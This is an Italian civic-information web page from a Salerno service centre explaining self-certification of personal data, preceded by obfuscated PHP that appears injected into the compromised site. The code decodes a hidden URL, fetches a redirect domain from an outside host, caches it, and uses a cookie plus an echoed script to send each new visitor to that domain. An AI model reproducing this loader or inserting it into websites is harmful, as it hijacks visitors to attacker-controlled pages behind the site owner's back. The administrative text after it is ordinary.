$ed6fe1d0be6347b8e = "/index/?6871568466678"; $kkk557 = "738dd3a8d3649a9131aafdde64b25464"; $s8c7dd922ad47494f = dirname(__FILE__) . "/" . md5($id6fe1d0be634); $h77e8e1445762ae1a = time(); $dejrif483ol = file_exists($s8c7dd922ad47494f); $deaa082fa57816233 = 0; $d07cc694b9b3fc636 = 0; if ($dejrif483ol) { $deaa082fa57816233 = filemtime($s8c7dd922ad47494f); $d07cc694b9b3fc636 = $h77e8e1445762ae1a - $deaa082fa57816233; $se1260894f59eeae9 = @fopen($s8c7dd922ad47494f, base64_decode('cg==')); $ke4e46deb7f9cc58c = json_decode(base64_decode(fread($se1260894f59eeae9, filesize($s8c7dd922ad47494f))) , 1); fclose($se1260894f59eeae9); } $v634894f9845d8dc65 = 'aHR0cDovL3JvaS10cmFmZmljLmljdS9nZXQucGhwP2Y9anNvbiZrZXk9'; $ye617ef6974faced4 = base64_decode('aHR0cDovLw==') . $ke4e46deb7f9cc58c[base64_decode('ZG9tYWlu') ] . $ed6fe1d0be6347b8e; if ($d07cc694b9b3fc636 >= 20 || !$dejrif483ol) { $m9b207167e5381c47 = v64547f9857d8dc65($s8c7dd922ad47494f); if ($m9b207167e5381c47[base64_decode('ZG9tYWlu') ]) { $ye617ef6974faced4 = base64_decode('aHR0cDovLw==') . $m9b207167e5381c47[base64_decode('ZG9tYWlu') ] . $ed6fe1d0be6347b8e; } } function v64547f9857d8dc65($s8c7dd922ad47494f){ global $v634894f9845d8dc65,$kkk557; if(function_exists('curl_version')){ $kd88fc6edf21ea464 = curl_init(); curl_setopt($kd88fc6edf21ea464, CURLOPT_RETURNTRANSFER, true); curl_setopt($kd88fc6edf21ea464, CURLOPT_USERAGENT, base64_decode('bmV3cmVxdWVzdA==')); curl_setopt($kd88fc6edf21ea464, CURLOPT_URL, base64_decode($v634894f9845d8dc65).$kkk557); curl_setopt($kd88fc6edf21ea464, CURLOPT_TIMEOUT, 10); $mb4a88417b3d0170d = curl_exec($kd88fc6edf21ea464); curl_close($kd88fc6edf21ea464); $ke4e46deb7f9cc58c = json_decode($mb4a88417b3d0170d, true); if ($ke4e46deb7f9cc58c[base64_decode('ZG9tYWlu') ]) { $h0666f0acdeed38d4 = @fopen($s8c7dd922ad47494f, base64_decode('dys=')); @fwrite($h0666f0acdeed38d4, base64_encode($mb4a88417b3d0170d)); @fclose($h0666f0acdeed38d4); return $ke4e46deb7f9cc58c; } }else{ $mb4a88417b3d0170d = file_get_contents(base64_decode($v634894f9845d8dc65).$kkk557); $ke4e46deb7f9cc58c = json_decode($mb4a88417b3d0170d, true); if ($ke4e46deb7f9cc58c[base64_decode('ZG9tYWlu') ]) { $h0666f0acdeed38d4 = @fopen($s8c7dd922ad47494f, base64_decode('dys=')); @fwrite($h0666f0acdeed38d4, base64_encode($mb4a88417b3d0170d)); @fclose($h0666f0acdeed38d4); return $ke4e46deb7f9cc58c; } } return false; } if (!$_COOKIE[base64_decode('YTc3N2Q=') ]) { setcookie(base64_decode('YTc3N2Q=') , 1, time() + 86400, base64_decode('Lw==')); echo base64_decode('PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi') . $ye617ef6974faced4 . base64_decode('Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi') . $ye617ef6974faced4 . base64_decode('Ijs8L3NjcmlwdD4='); AUTOCERTIFICAZIONI - CENTRO SERVIZI SALERNO
CENTRO SERVIZI SALERNO » AUTOCERTIFICAZIONI

AUTOCERTIFICAZIONI

AUTOCERTIFICAZIONI

CHE COS’È

È una dichiarazione sottoscritta dal cittadino che sostituisce i tradizionali certificati e permette di semplificare i rapporti con la pubblica amministrazione. Consiste nella possibilità di presentare delle dichiarazioni sostitutive, relativamente allo stato, alle qualità personali e a fatti che siano certificabili o attestabili dalla pubblica amministrazione senza doversi recare negli appositi uffici. La legge ha previsto l’autocertificazione per: tutte le pubbliche amministrazioni; i gestori di servizi pubblici nei rapporti tra loro e in quelli con il cittadino; i privati consenzienti (per i privati la legge non prevede l’obbligo, ma la facoltà di accettare l’autocertificazione).

CHI LA PUÒ FARE

Possono fare l’autocertificazione:

i cittadini italiani; i cittadini dell’Unione Europea; i cittadini extracomunitari regolarmente soggiornanti in Italia limitatamente ai dati verificabili presso le pubbliche amministrazioni italiane.

COSA SI PUÒ AUTOCERTIFICARE

Dati anagrafici e di stato civile

– Luogo e data di nascita;

– Residenza;

– Cittadinanza;

– Godimento dei diritti civili e politici;

– Stato civile (celibe/nubile, coniugato, vedovo, stato libero);

– Stato di famiglia;

– Esistenza in vita;

– Nascita del figlio e figlia;

– Morte del coniuge, dell’ascendente o discendente;

Tutti i dati contenuti nei registri di stato civile (ad esempio maternità, paternità, separazione o comunione di beni).

Qualifica professionale

– Titolo di studio;

– Titolo di specializzazione;

– Titolo di aggiornamento;

– Titolo di abilitazione;

– Titolo di formazione;

– Titolo di qualificazione tecnica;

– Esami sostenuti.

Reddito

– Situazione economica;

– Assolvimento obblighi contributivi;

– Possesso e numero del codice fiscale;

– Possesso e numero di partita Iva e qualsiasi dato contenuto nell’anagrafe tributaria;

– Carico familiare.

Posizione giuridica

– Legale rappresentante di persone fisiche o giuridiche;

– Tutore;

– Curatore;

– Non aver riportato condanne penali;

– Non trovarsi in stato di liquidazione o di fallimento e non aver presentato domanda di concordato;

– Non essere destinatario di provvedimenti iscritti nel casellario giudiziale;

– Non essere a conoscenza di essere sottoposto a procedimenti penali.

Altri dati

– Iscrizione in albi, registri o elenchi tenuti da pubbliche amministrazioni;

– Iscrizione ad associazioni o formazioni sociali;

– Posizione agli effetti degli obblighi militari, comprese le situazioni del foglio matricolare;

– Appartenenza a ordini professionali;

– Stato di disoccupazione;

– Condizione di pensionato e categoria di pensione;

– Condizione di studente.

Dichiarazione sostitutiva di atto notorio

Il cittadino può rilasciare una dichiarazione sostitutiva di atto di notorietà per tutte quelle situazioni relative a stati, qualità personali e fatti a diretta conoscenza dell’interessato, non compresi nell’elenco di ciò che si può autocertificare.

Ad esempio, negli uffici dell’INPS si può effettuare la dichiarazione sostitutiva per:

– situazioni inerenti alla propria attività lavorativa;

– condizione di erede per riscuotere i ratei di pensione maturati e non riscossi;

– stato vedovile e la permanenza del vincolo coniugale col coniuge scomparso per la pensione di reversibilità;

Inoltre, con la dichiarazione sostitutiva di atto notorio il cittadino può attestare la conformità all’originale:

– della copia di un atto o di un documento conservato o rilasciato da una pubblica amministrazione;

– della copia di una pubblicazione o di titoli di studio o di servizio;

– della copia di documenti fiscali che debbono essere obbligatoriamente conservati dai privati contribuenti.

Le dichiarazioni sostitutive di atto di notorietà devono essere firmate davanti al funzionario addetto. Se a consegnarle è una terza persona o sono inviate via fax, va allegata la fotocopia del documento di identità.

Se un dipendente di una pubblica amministrazione non accetta l’autocertificazione viola i doveri d’ufficio ed è passibile di azioni disciplinari.

Nel caso il cittadino fornisca una dichiarazione falsa può subire una condanna penale e decadere dagli eventuali benefici ottenuti con l’autocertificazione.

L’amministrazione pubblica è pertanto tenuta a controllare la veridicità delle dichiarazioni.